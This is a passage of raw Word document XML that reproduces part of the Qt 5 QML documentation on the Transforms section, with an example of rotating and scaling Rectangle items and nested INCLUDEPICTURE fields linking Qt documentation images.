          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B75670">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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png"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"http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1029" type="#_x0000_t75" alt="" style="width:208.5pt;height:2in">
            <v:imagedata r:id="rId465" r:href="rId466"/>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00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00507851">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="610" w:name="transforms"/>
      <w:bookmarkStart w:id="611" w:name="_Toc483000660"/>
      <w:bookmarkStart w:id="612" w:name="_Toc483003677"/>
      <w:bookmarkStart w:id="613" w:name="_Toc483604013"/>
      <w:bookmarkStart w:id="614" w:name="_Toc483605233"/>
      <w:bookmarkEnd w:id="610"/>
      <w:r w:rsidRPr="00507851">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transforms</w:t>
      </w:r>
      <w:bookmarkEnd w:id="611"/>
      <w:bookmarkEnd w:id="612"/>
      <w:bookmarkEnd w:id="613"/>
      <w:bookmarkEnd w:id="614"/>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Quick types have </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>built-in support for transformations</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If you wish to have your visual content rotated or scaled, you can set the</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId467" w:anchor="rotation-prop" w:history="1">
        <w:r w:rsidRPr="0048415B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::rotation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId468" w:anchor="scale-prop" w:history="1">
        <w:r w:rsidRPr="0048415B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::scale</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property. These can also be animated.</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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QtQuick</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2.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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320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480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Rectangle</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#272822"</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320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480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Rectangle</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rotation</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45</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This rotates the Rectangle by 45 degrees</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00CE3069"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CE3069">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3069">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3069">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3069">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00CE3069"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E3069">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        y</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3069">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3069">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3069">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>160</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00CE3069"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E3069">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        width</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3069">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3069">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3069">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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</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t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w: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lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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scale</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0.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This scales the Rectangle down to 80% size</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x</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160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y</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160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width</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        height</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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12022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        color</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00112022" w:rsidRPr="00112022" w:rsidRDefault="00112022" w:rsidP="00112022">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00112022">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-visual-transforms.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
